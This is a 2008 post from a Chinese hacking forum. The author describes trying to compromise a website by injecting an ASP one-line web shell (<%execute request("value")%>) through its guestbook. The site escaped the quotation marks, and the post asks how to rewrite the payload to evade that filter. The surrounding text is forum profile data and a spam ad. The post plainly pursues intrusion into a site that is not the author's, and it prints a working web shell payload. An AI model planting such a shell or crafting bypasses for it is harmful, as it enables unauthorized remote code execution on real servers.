|
 
- 帖子
- 270
- 积分
- 733
- 威望
- 1168
- 金钱
- 874
- 在线时间
- 2 小时
  
|
[讨论]关于一句话如果绕过网站的过滤限制
议题作者:kyo-esr
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
今天碰到一个棘手的问题,日一个站日了半天愣是没有办法,都是静态页面,最后google了一下,竟然有asp的留言版~~
直接插入一句话,留完言后一看, <%execute request("value")%>给过滤成<%execute request("value") 
[localimg=400,46]截图[/localimg]
晕,以前碰到的都是直接过滤了百分号的,这次过滤了引号,头一次遇到 
"过滤成了"
改怎么改写一句话才能绕过?
thk
附件
 1.jpg (78.8 KB)
2008-6-4 16:10
 i am the bird...
帖子1 精华0 积分3 阅读权限40 性别男 来自none 在线时间3 小时 注册时间2006-8-26 最后登录2008-6-4 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味
benben 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-21 00:11
| 
